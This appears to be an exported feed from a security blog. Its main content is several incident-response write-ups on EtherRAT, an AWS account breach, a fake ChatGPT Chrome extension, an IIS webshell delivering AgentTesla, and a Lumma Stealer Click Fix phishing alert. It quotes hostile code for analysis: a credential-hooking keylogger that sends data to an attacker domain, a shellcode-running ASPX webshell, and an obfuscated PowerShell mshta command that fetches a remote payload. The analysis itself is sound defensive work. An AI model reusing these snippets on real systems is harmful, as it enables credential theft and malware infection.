fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef c2 fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; A([Attacker Infrastructure]):::default --\u003e B[Nmap SYN Decoy Scan]:::access B --\u003e C[18:36 - Exploit CVE-2025-55182 via /loginNext.js RSC Deserialization RCE]:::access subgraph Stage1 [Stage 1: Deployment] C --\u003e D[curl/wget downloads s.shfrom 63.176.62.199:443]:::exec D --\u003e E[Creates hidden dir .05bf0e9bDownloads standalone Node.js]:::exec E --\u003e F[Deploys TLS KeyloggerHooks tls.connect to steal master secrets]:::persist end subgraph Stage2 [Stage 2 \u0026 3: EtherRAT] F --\u003e G[.kxnzl4mtez.js dropsDecrypts AES blob .1d5j6rm2mg2d]:::exec G --\u003e H[.7vfgycfd01.js Main Implant executesChecks locale and begins C2 resolution]:::exec end subgraph BlockchainC2 [Blockchain C2 Resolution] H --\u003e I[18:37 - RPC queries to Public Ethereum NodesReads Primary \u0026 Fallback Smart Contracts]:::c2 I --\u003e J[Attempts Primary 91.215.85.42:3000 -\u003e 404]:::c2 J --\u003e K[Resolves to Fallback 63.176.62.199:443]:::c2 end subgraph PostExploit [Post-Exploitation \u0026 Exfiltration] K --\u003e L[Downloads Recon ScriptExfiltrates host config \u0026 AWS/SSH paths]:::exfil L --\u003e M[Downloads Sensitive File SearcherExfiltrates AWS, SSH, and Env secrets]:::exfil M --\u003e N[Installs Deep Persistencesystemd, XDG, cron, bashrc, profile]:::persist N --\u003e O[Installs SSH Backdoormaromalix@ether_dev in authorized_keys]:::persist O --\u003e P[Upgrades Next.js to 15.3.9Patches CVE to lock out other attackers]:::exec end ","date":"April 16, 2026","externalUrl":null,"permalink":"/investigations/cdef-etherrat/","section":"","summary":"An attacker breached Maromalix’s public-facing web application by exploiting CVE-2025-55182 (Next.js Deserialization RCE). They deployed a multi-stage implant dubbed EtherRAT, which utilizes a blockchain-based C2 mechanism via Ethereum smart contracts to dynamically resolve infrastructure. The attacker exfiltrated sensitive data, established multiple persistence mechanisms, and ultimately patched the vulnerability to lock out other actors.","title":"CDEF-EtherRAT","type":"investigations"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/cve-2025-55182/","section":"Tags","summary":"","title":"CVE-2025-55182","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/ethereum/","section":"Tags","summary":"","title":"Ethereum","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/etherrat/","section":"Tags","summary":"","title":"EtherRAT","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/javascript/","section":"Tags","summary":"","title":"JavaScript","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/linux/","section":"Tags","summary":"","title":"Linux","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/malware-analysis/","section":"Tags","summary":"","title":"Malware Analysis","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/network-analysis/","section":"Tags","summary":"","title":"Network Analysis","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/nmap/","section":"Tags","summary":"","title":"Nmap","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/pcap/","section":"Tags","summary":"","title":"PCAP","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/rat/","section":"Tags","summary":"","title":"RAT","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/smart-contract/","section":"Tags","summary":"","title":"Smart Contract","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/tls-sniffer/","section":"Tags","summary":"","title":"TLS Sniffer","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/web-attack/","section":"Tags","summary":"","title":"Web Attack","type":"tags"},{"content":"","date":"April 16, 2026","externalUrl":null,"permalink":"/tags/wireshark/","section":"Tags","summary":"","title":"Wireshark","type":"tags"},{"content":" ","date":"April 15, 2026","externalUrl":null,"permalink":"/blue_team/","section":"","summary":"","title":"","type":"blue_team"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/aws/","section":"Tags","summary":"","title":"AWS","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/bruteforce/","section":"Tags","summary":"","title":"BruteForce","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/cloudtrail/","section":"Tags","summary":"","title":"CloudTrail","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/dfir/","section":"Tags","summary":"","title":"DFIR","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/iam/","section":"Tags","summary":"","title":"IAM","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/log-analysis/","section":"Tags","summary":"","title":"Log Analysis","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/s3/","section":"Tags","summary":"","title":"S3","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/siem/","section":"Tags","summary":"","title":"SIEM","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/soc/","section":"Tags","summary":"","title":"SOC","type":"tags"},{"content":"","date":"April 15, 2026","externalUrl":null,"permalink":"/tags/splunk/","section":"Tags","summary":"","title":"Splunk","type":"tags"},{"content":" TL;DR # Starting at 09:53:27, an attacker operating from 185.192.70.84 executed a targeted brute-force attack against AWS accounts, successfully compromising helpdesk.luke within 33 seconds. The attacker immediately began environment reconnaissance from rotating IPs within the 185.192.70.0/24 subnet. Using the compromised access, they exfiltrated multiple high-value objects from S3 buckets, including CustomerData_Backup_2023-11-01.zip and secrets_vault_dump.bak. To facilitate broader access, they disabled PublicAccessBlock configurations on the backup-and-restore bucket. Finally, rotating to IP 185.192.70.78, the attacker established persistence by creating a new IAM user, marketing.mark, and escalated privileges by adding this backdoor account to the Admins group.\nInitial Access # Brute Force # I received an incident report regarding potential unauthorized access and data exfiltration within our AWS environment. I started the investigation with a broad CloudTrail query to look for brute-force activity.\nindex = * sourcetype=\u0026#34;aws:cloudtrail\u0026#34; eventName = \u0026#34;ConsoleLogin\u0026#34; | table _time, userIdentity.userName, responseElements.ConsoleLogin,sourceIPAddress The logs revealed a rapid sequence of 8 failed login attempts originating from 185.192.70.84 within just 33 seconds. At 2023-11-02 09:54:04, the brute-force attack succeeded, and the attacker gained access to the helpdesk.luke account. I checked the originating IP and confirmed it belongs to a known UK-based VPN provider, indicating the attacker is attempting to mask their true location.\nDiscovery and Reconnaissance # Immediately following the successful login, the attacker began executing discovery commands (e.g., DescribeRegions, ListIndexes, ListBuckets, GetBucketPolicyStatus) to map out the AWS environment and identify target resources.\nDuring this recon phase, the attacker began rotating their source IPs across the 185.192.70.0/24 subnet, leveraging their VPN provider\u0026rsquo;s infrastructure to distribute the activity.\nExiltration # S3 bucket # I focused my search on S3 access logs for the compromised helpdesk.luke account to identify what data the attacker accessed.\nindex=* sourcetype=\u0026#34;aws:cloudtrail\u0026#34; *helpdesk* AND (eventName IN (GetObject, PutObject)) | sort _time The logs confirmed significant data exfiltration. The attacker issued multiple GetObject requests, successfully downloading several highly sensitive and critical files from various S3 buckets:\nsecrets_vault_dump.bak (from backup-and-restore98825501) CustomerData_Backup_2023-11-01.zip (from customer-data-backup57893984) Contract_Agreement.pdf (from legal-docs45020393) prototype.obj (from research-project-files23411723) PublicAccessBlock # At 09:58, the attacker modifies the security posture of the backup-and-restore98825501 bucket.\n1requestParameters.PublicAccessBlockConfiguration.BlockPublicAcls: false 2requestParameters.PublicAccessBlockConfiguration.BlockPublicPolicy: false 3requestParameters.PublicAccessBlockConfiguration.IgnorePublicAcls: false 4requestParameters.PublicAccessBlockConfiguration.RestrictPublicBuckets: false By setting all these parameters to false, the attacker effectively disabled the S3 Block Public Access protections, making the bucket public and allowing unauthenticated internet access to its contents.\nPersistence and Privilege Escalation # New User # To maintain access even if the helpdesk.luke account password was reset, the attacker established a backdoor. Rotating to a new IP address, 185.192.70.78, they created a new IAM user named marketing.mark.\nAdmins group # Following the account creation, the attacker added marketing.mark to the Admins IAM group, granting their backdoor account full administrative privileges over the AWS environment.\nIOCs # Type Value Description IP 185.192.70.84 Initial brute-force source (VPN Consumer London) IP Subnet 185.192.70.0/24 Rotating VPN infrastructure used for reconnaissance IP 185.192.70.78 Source IP used for creating the backdoor account Account helpdesk.luke Initial compromised account Account marketing.mark Backdoor IAM account created by the attacker Group Admins IAM group abused for privilege escalation Bucket backup-and-restore98825501 S3 bucket modified to allow public access File secrets_vault_dump.bak Exfiltrated high-value data File CustomerData_Backup_2023-11-01.zip Exfiltrated high-value data Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef recon fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef evasion fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; A([VPN IP - 185.192.70.84]):::default --\u003e B[09:53:27 - Brute-force attack begins]:::access B --\u003e C[09:54:04 - Successful login to helpdesk.luke]:::access subgraph Discovery [Discovery] C --\u003e D[09:54-09:55 - ReconnaissanceDescribeRegions, ListBuckets, etc.IPs rotating via 185.192.70.0/24]:::recon end subgraph Collection [Data Exfiltration] D --\u003e E[09:55-09:57 - GetObject executionExfiltration of CustomerData_Backup.zip,secrets_vault_dump.bak, and others]:::exfil end subgraph Defense [Defense Evasion] E --\u003e F[09:58:01 - PutBucketPublicAccessBlockbackup-and-restore bucket made public]:::evasion end subgraph Persistence [Persistence \u0026 PrivEsc] F --\u003e G[09:59:33 - Creation of backdoor IAM usermarketing.mark from IP 185.192.70.78]:::persist G --\u003e H[09:59 - marketing.mark added to Admins group]:::persist end ","date":"April 15, 2026","externalUrl":null,"permalink":"/blue_team/splunk-awsraid/","section":"","summary":"An attacker conducted a brute-force attack to compromise the helpdesk.luke account, performed reconnaissance from various VPN IPs, exfiltrated sensitive data including customer backups and secrets, modified bucket permissions, and established persistence by creating an admin backdoor account.","title":"Splunk-AWSRaid","type":"blue_team"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/abuseipdb/","section":"Tags","summary":"","title":"AbuseIPDB","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/active-directory/","section":"Tags","summary":"","title":"Active Directory","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/agenttesla/","section":"Tags","summary":"","title":"AgentTesla","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/anti-vm/","section":"Tags","summary":"","title":"Anti-VM","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/as-rep-roasting/","section":"Tags","summary":"","title":"AS-REP Roasting","type":"tags"},{"content":" TL;DR # I analyzed a malicious Chrome extension posing as a ChatGPT assistant. The background loader uses basic anti analysis checks to avoid sandboxes before injecting the main payload core/app.js into all web pages. The core script specifically targets www.facebook.com, hooking form submissions to steal credentials and capturing keystrokes. All stolen data is AES encrypted with a hardcoded key and exfiltrated to https://Mo.Elshaheedy.com via image GET requests.\nExtension structure # Before digging into the specific malware, it helps to understand the standard components of a Chrome extension.\nManifest.json: The core configuration file, specifying metadata, permissions, and behavior. Key fields to inspect include permissions (e.g., access to cookies, tabs, or external URLs), host permissions defining interaction with specific domains, and content scripts or web accessible resources indicating injected functionality. Background Scripts: Persistent scripts managing event handling and browser monitoring. Often exploited for tracking user activity or sending data to remote servers. Content Scripts: Injected into web pages to interact with the DOM. A common vector for data theft or page manipulation. Popup Scripts: Handle the extension\u0026rsquo;s user interface, which may conceal malicious actions or mislead users. Web-Accessible Resources: Files accessible by web pages, potentially used to deliver malicious payloads or expose sensitive data. External Resources: URLs or scripts loaded externally, often linked to malicious domains or obfuscated content. Initial Triage # I started by looking at the manifest.json file to see how this specific extension is configured. It calls itself \u0026ldquo;ChatGPT\u0026rdquo; and claims to be an AI powered assistant, but the configuration is highly suspicious.\nBreaking down the manifest reveals its true capabilities:\nPermissions: Broad access to all web pages (http://*/* and https://*/*), browser tabs, and cookies. Privileges for webRequest and webRequestBlocking enable interception and modification of network traffic, which could redirect users or inject malicious scripts. The storage permission allows saving potentially stolen data locally. Background Script: The persistent script (system/loader.js) runs continuously, allowing real time monitoring, data exfiltration, and possible communication with a Command and Control (C2) server. Content Scripts: The injected script (core/app.js) runs on all pages (\u0026lt;all_urls\u0026gt;), interacting with the DOM to read sensitive user input, manipulate content, and potentially log keystrokes or inject phishing forms. Browser Action: A popup UI (assets/ui.html) provides a seemingly legitimate interface, potentially hiding malicious functionality or links. Anti Analysis and Loader # I checked out system/loader.js next to see how it bootstraps the execution.\nThere\u0026rsquo;s a quick anti sandbox check right at the start. It checks if navigator.plugins.length is 0 or if the user agent contains HeadlessChrome. Automated analysis environments and headless browsers typically don\u0026rsquo;t have plugins installed, so if this triggers, the script throws an alert and disables itself by returning false on messages. If the check passes, it dynamically creates a script tag to load the main payload, core/app.js.\nTargeting and Keylogging # I grabbed the main logic from app.js to see what it actually does once injected into a page.\n1 const targets = [_0xabc1(\u0026#39;d3d3LmZhY2Vib29rLmNvbQ==\u0026#39;)]; 2 if (targets.indexOf(window.location.hostname) !== -1) { 3 document.addEventListener(\u0026#39;submit\u0026#39;, function(event) { 4 let form = event.target; 5 let formData = new FormData(form); 6 let username = formData.get(\u0026#39;username\u0026#39;) || formData.get(\u0026#39;email\u0026#39;); 7 let password = formData.get(\u0026#39;password\u0026#39;); 8 9 if (username \u0026amp;\u0026amp; password) { 10 exfiltrateCredentials(username, password); 11 } 12 }); 13 14 document.addEventListener(\u0026#39;keydown\u0026#39;, function(event) { 15 var key = event.key; 16 exfiltrateData(\u0026#39;keystroke\u0026#39;, key); 17 }); 18 } The script defines a target array with a base64 encoded string d3d3LmZhY2Vib29rLmNvbQ==. Decoding this reveals www.facebook.com. If the victim is on Facebook, it attaches an event listener to any form submissions, specifically looking for username or email along with password fields. If it finds them, it passes them to an exfiltration function. It also attaches a global keydown listener, effectively acting as a keylogger for anything typed on the site.\nEncryption and Exfiltration # I looked at the rest of app.js to understand how exfiltrateCredentials and exfiltrateData process the stolen information.\nThe script packs the stolen data along with the hostname into a JSON payload. It passes this to encryptPayload, which uses CryptoJS to AES encrypt the data. The key is hardcoded as SuperSecretKey123, and the Initialization Vector is randomly generated. It concatenates the IV and ciphertext, base64 encodes it, and hands it off to sendToServer.\nTo actually get the data out, sendToServer uses pixel tracking. It creates a new Image object and sets the source to https://Mo.Elshaheedy.com/collect?data= appended with the URL encoded encrypted payload. Appending the image to the document body forces the browser to make a GET request to the attacker\u0026rsquo;s C2. This is a common trick to bypass CORS restrictions and silently exfiltrate data without triggering obvious XHR or Fetch alerts in the network tab.\nIOCs # Value Description https://Mo.Elshaheedy.com/collect Exfiltration C2 endpoint SuperSecretKey123 Hardcoded AES encryption key d3d3LmZhY2Vib29rLmNvbQ== Base64 encoded target (www.facebook.com) system/loader.js Extension background loader script core/app.js Extension main payload script Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef mal fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; A([Victim Browser]):::default --\u003e B[loader.js executesChecks for virtual environment]:::exec B --\u003e C[app.js injectedTargets www.facebook.com]:::mal C --\u003e D[Hooks forms and keystrokesCaptures credentials]:::access D --\u003e E[AES EncryptionHardcoded key]:::exec E --\u003e F[GET Request via ImageMo.Elshaheedy.com]:::exfil ","date":"April 14, 2026","externalUrl":null,"permalink":"/investigations/cdef-fakegpt/","section":"","summary":"A malicious Chrome extension masquerading as ChatGPT uses anti analysis checks, hooks Facebook login forms, and acts as a keylogger, exfiltrating AES encrypted data via pixel tracking.","title":"CDEF-FakeGPT","type":"investigations"},{"content":" TL;DR # An attacker at 10.0.2.4 began with an Nmap SYN scan against IIS server 10.0.2.15, identifying open ports 80, 135, 139, 443, and 445. Using SMB access to an unauthenticated Documents share, the attacker read information.txt and uploaded shell.aspx - an ASPX webshell using VirtualAlloc and CreateThread to execute shellcode in memory. A GET request to /Documents/shell.aspx returned HTTP 200, triggering a reverse shell from w3wp.exe back to the attacker on port 4443. The IIS worker process then spawned updatenow.exe, which was placed in the Startup folder for persistence. The file was confirmed as AgentTesla (56/70 VT detections) and established SMTP communication to cp8nl.hyperhost.ua:587 for data exfiltration.\nReconnaissance # Port Scanning # I opened the PCAP in Wireshark and applied the filter tcp.flags.syn == 1 \u0026amp;\u0026amp; tcp.flags.ack == 0 to isolate outbound SYN packets without corresponding ACKs - the signature pattern of an Nmap SYN scan, where the scanner sends SYN packets to many ports but never completes the TCP handshake.\nThe results showed 10.0.2.4 sending SYN packets to a wide range of ports on 10.0.2.15. To identify which ports responded, I switched the filter to tcp.flags.syn == 1 \u0026amp;\u0026amp; tcp.flags.ack == 1 to capture SYN-ACK responses from the target.\nThe target replied with SYN-ACK on ports:\n80 (HTTP) 135 (RPC) 139 and 445 (SMB) SMB Enumeration # With ports identified, the attacker moved to SMB reconnaissance. Filtering for SMB2 traffic revealed a connection to the share \\\\10.0.2.15\\IPC$ followed by a NetShareEnumAll request via the SRVSVC named pipe. In result, the attacker enumerated all network shares on the remote host without authentication.\nThe attacker connected to \\\\10.0.2.15\\Documents and sent a Find Request with a wildcard pattern * to list all files.\nWebshell Upload # Share Content Analysis # The directory listing returned 4 objects. The attacker issued an SMB2 Read Request for information.txt, which contained a note from the development team revealing that the server was configured to link the web server with SMB - confirming that the Documents share was directly served by IIS.\n1This server setup is under development. We are trying to link the web server with SMB. 2Please do not tamper with our work. 3Best regards 4Dev Team ASPX Webshell Deployment # The attacker uploaded shell.aspx via an SMB2 Write Request of 1,015,024 bytes. The webshell uses Windows API calls imported via P/Invoke - VirtualAlloc allocates executable memory and CreateThread executes a shellcode byte array embedded directly in the Page_Load method:\n1 protected void Page_Load(object sender, EventArgs e) 2 { 3 byte[] aQG_MD7kxARm = new byte[200774] {0x4d,0x5a,0x41,0x52, ... ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff, 40xff,0xff}; 5 6 IntPtr oljksbhqM3m = VirtualAlloc(IntPtr.Zero,(UIntPtr)aQG_MD7kxARm.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 7 System.Runtime.InteropServices.Marshal.Copy(aQG_MD7kxARm,0,oljksbhqM3m,aQG_MD7kxARm.Length); 8 IntPtr kdw1 = IntPtr.Zero; 9 IntPtr beozdB = CreateThread(IntPtr.Zero,UIntPtr.Zero,oljksbhqM3m,IntPtr.Zero,0,ref kdw1); 10 } 11\u0026lt;/script\u0026gt; Webshell Execution and Reverse Shell # HTTP Trigger # The attacker triggered the webshell with a GET request to /Documents/shell.aspx. The server responded with HTTP 200 OK, confirming successful execution.\nReverse Shell Establishment # After the HTTP 200 response, a new SYN packet originated from 10.0.2.15:49688 toward 10.0.2.4:4443 - the victim initiating an outbound connection to the attacker on port 4443.\nPost-Exploitation and Persistence # Process Tree Analysis # Next I analyzed the memory dump using Volatility. The process list showed w3wp.exe (PID 4332) with a child process updatenow.exe (PID 900, PPID 4332). w3wp.exe is the IIS worker process that handles web requests sent to a web server running Microsoft’s Internet Information Services (IIS). Whenever a user accesses a resource on an IIS server, this is the process responsible for executing those requests. The network connections output shows that w3wp.exe (PID 4332) held a TCP connection from port 49688 to 10.0.2.4:4443 Startup Folder Persistence # The full path for updatenow.exe was recovered from the memory dump. Placing an executable in the Startup folder\n1C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updatenow.exe Payload Identification and Exfiltration # Malware Confirmation # I extracted updatenow.exe from the memory dump for analysis. The file is a 32-bit PE packed with UPX.\n1updatenow.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed 2MD5: d797600296ddbed4497725579d814b7e 3SHA256: c25a6673a24d169de1bb399d226c12cdc666e0fa534149fc9fa7896ee61d406f C2 and Exfiltration Channel # VirusTotal\u0026rsquo;s network behavior showed DNS resolution of cp8nl.hyperhost.ua resolving to 185.174.175.187, with a TCP connection established to port 587. Checking cp8nl.hyperhost.ua on VirusTotal confirmed 3/94 vendors flagged the domain, with crowdsourced context explicitly linking it to AgentTesla C2 infrastructure.\nA threat intelligence database lookup on the SHA256 hash returned a definitive match to AgentTesla - a commercial infostealer and keylogger known for credential theft, clipboard capture, and SMTP-based exfiltration.\nAttack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef recon fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef shell fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([10.0.2.4 - Attacker]):::start --\u003e B[Nmap SYN scan10.0.2.15 - open: 80 135 139 445]:::recon subgraph SMB [SMB Enumeration and Webshell Upload] B --\u003e C[IPC$ connectionNetShareEnumAll via SRVSVC]:::recon C --\u003e D[Documents share accessedinformation.txt read]:::recon D --\u003e E[shell.aspx uploadedSMB2 Write 1015024 bytes]:::exec end subgraph Shell [Webshell Execution] E --\u003e F[GET /Documents/shell.aspxHTTP 200 OK]:::shell F --\u003e G[w3wp.exe PID 4332reverse shell to 10.0.2.4:4443]:::shell end subgraph Persist [Persistence] G --\u003e H[w3wp.exe spawnsupdatenow.exe PID 900]:::persist H --\u003e I[updatenow.exe placed inStartup folder - T1547.001]:::persist end subgraph Exfil [Exfiltration] I --\u003e J[AgentTesla beaconscp8nl.hyperhost.ua:587 SMTP]:::exfil J --\u003e K([Credentials and keylog dataexfiltrated via email185.174.175.187]):::exfil end IOCs # Type Value Description IP 10.0.2.4 attacker IP - scanner, SMB client, reverse shell listener IP 10.0.2.15 victim IIS server IP 185.174.175.187 AgentTesla SMTP exfiltration server Domain cp8nl.hyperhost[.]ua AgentTesla C2, 3/94 VT, SMTP port 587 File shell.aspx ASPX webshell using VirtualAlloc and CreateThread shellcode execution File updatenow.exe AgentTesla, SHA256: c25a6673a24d169de1bb399d226c12cdc666e0fa534149fc9fa7896ee61d406f, MD5: d797600296ddbed4497725579d814b7e, 56/70 VT Share \\\\10.0.2.15\\Documents unauthenticated SMB share used for webshell upload Path C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updatenow.exe persistence via Startup folder T1547.001 Port 4443/TCP reverse shell listener on attacker host Port 587/TCP SMTP exfiltration channel ","date":"April 14, 2026","externalUrl":null,"permalink":"/investigations/cdef-lockdown/","section":"","summary":"An attacker performed SYN port scanning against an IIS server, enumerated open SMB shares, uploaded a webshell to the Documents share, triggered a reverse shell on port 4443, and established persistence via AgentTesla dropped into the Startup folder, which exfiltrated data via SMTP to cp8nl.hyperhost.ua.","title":"CDEF-Lockdown","type":"investigations"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/click-fix/","section":"Tags","summary":"","title":"Click Fix","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/credential-dumping/","section":"Tags","summary":"","title":"Credential Dumping","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/edr/","section":"Tags","summary":"","title":"EDR","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/escalation-to-l2/","section":"Tags","summary":"","title":"Escalation to L2","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/extension/","section":"Tags","summary":"","title":"Extension","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/fileless-malware/","section":"Tags","summary":"","title":"Fileless Malware","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/iis/","section":"Tags","summary":"","title":"IIS","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/infostealer/","section":"Tags","summary":"","title":"Infostealer","type":"tags"},{"content":"","date":"April 14, 2026","externalUrl":null,"permalink":"/tags/keylogger/","section":"Tags","summary":"","title":"Keylogger","type":"tags"},{"content":" Alert # 1EventID : 316 2Event Time : Mar, 13, 2025, 09:44 AM 3Rule : SOC338 - Lumma Stealer - DLL Side-Loading via Click Fix Phishing 4Level : Security Analyst 5SMTP Address : 132.232.40.201 6Source Address : update@windows-update.site 7Destination Address : dylan@letsdefend.io 8E-mail Subject : Upgrade your system to Windows 11 Pro for FREE 9Device Action : Allowed 10Trigger Reason : Redirected site contains a click fix type script for Lumma Stealer distribution. Identification # What was the delivery vector? # The phishing email arrived from update@windows-update.site (SMTP 132.232.40.201) to dylan@letsdefend.io at 09:44 AM - nearly 14 hours before execution, suggesting the user opened it later in the day. The email body impersonated an official Microsoft notification offering a free Windows 11 Pro upgrade with a prominent \u0026ldquo;UPDATE NOW\u0026rdquo; button.\nThe \u0026ldquo;UPDATE NOW\u0026rdquo; button linked to https://www.windows-update.site/. I checked the domain on VirusTotal - 11/95 vendors flagged it as malicious.\nDid the user interact? # Proxy logs confirmed that at Mar 13, 2025, 23:26 Dylan\u0026rsquo;s host (172.16.17.216) accessed https://windows-update.site/ with a referrer of https://mail.letsdefend.io/ - confirming the user clicked the link directly from webmail.\nWhat type of attack was attempted? # This is a Click Fix phishing attack - a technique where a malicious webpage presents a fake CAPTCHA or verification prompt instructing the user to manually copy and paste a PowerShell command into a Run dialog or terminal. The \u0026ldquo;I am not a robot - reCAPTCHA Verification ID\u0026rdquo; string embedded in the command confirms this pattern. The page presented the user with an obfuscated command disguised as a verification step:\n1Mar 13 2025 23:26:19 2\u0026#34;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\u0026#34; -w 1 powershell -Command 3(\u0026#39;ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4\u0026#39; -replace \u0026#39;]\u0026#39;) 4# ✅ \u0026#39;\u0026#39;I am not a robot - reCAPTCHA Verification ID: 3824 5 6Mar 13 2025 23:26:31 7\u0026#34;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\u0026#34; -Command 8\u0026#34;mshta.exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4\u0026#34; 9 10Mar 13 2025 23:26:32 11\u0026#34;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\u0026#34; -w 1 powershell -Command 12(\u0026#39;ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4\u0026#39; -replace \u0026#39;]\u0026#39;) 13# ✅ \u0026#39;\u0026#39;I am not a robot - reCAPTCHA Verification ID: 3824\u0026#39;\u0026#39; The -replace ']' call strips the bracket characters used to obfuscate mshta.exe, producing a clean command. mshta.exe is a legitimate Windows binary used to execute HTML Applications - abusing it as a LOLBin allows the attacker to fetch and execute remote content without writing a traditional executable to disk. The payload URL https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4 disguises the payload as a video file.\nNetwork activity confirmed mshta.exe (PID 7284) made a GET request to the payload URL.\nI submitted the URL to VirusTotal - 13/95 vendors flagged https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4 as malicious, confirming it as the Lumma Stealer payload.\nFollowing mshta.exe execution, the host made connections to 132.232.40.201 (the phishing domain) and 35.190.80.1. AbuseIPDB identified 35.190.80.1 as belonging to Google LLC CDN - attackers commonly abuse legitimate CDN infrastructure to host payloads and blend C2 traffic with normal web activity.\nDid anyone else get targeted? # Mail logs show the phishing email was delivered exclusively to dylan@letsdefend.io. No other recipients were identified.\nDid the attack succeed? # The payload was downloaded and executed via mshta.exe. Lumma Stealer is a credential and data theft tool - given successful payload execution, data exfiltration should be assumed until forensic analysis confirms otherwise. The host was contained 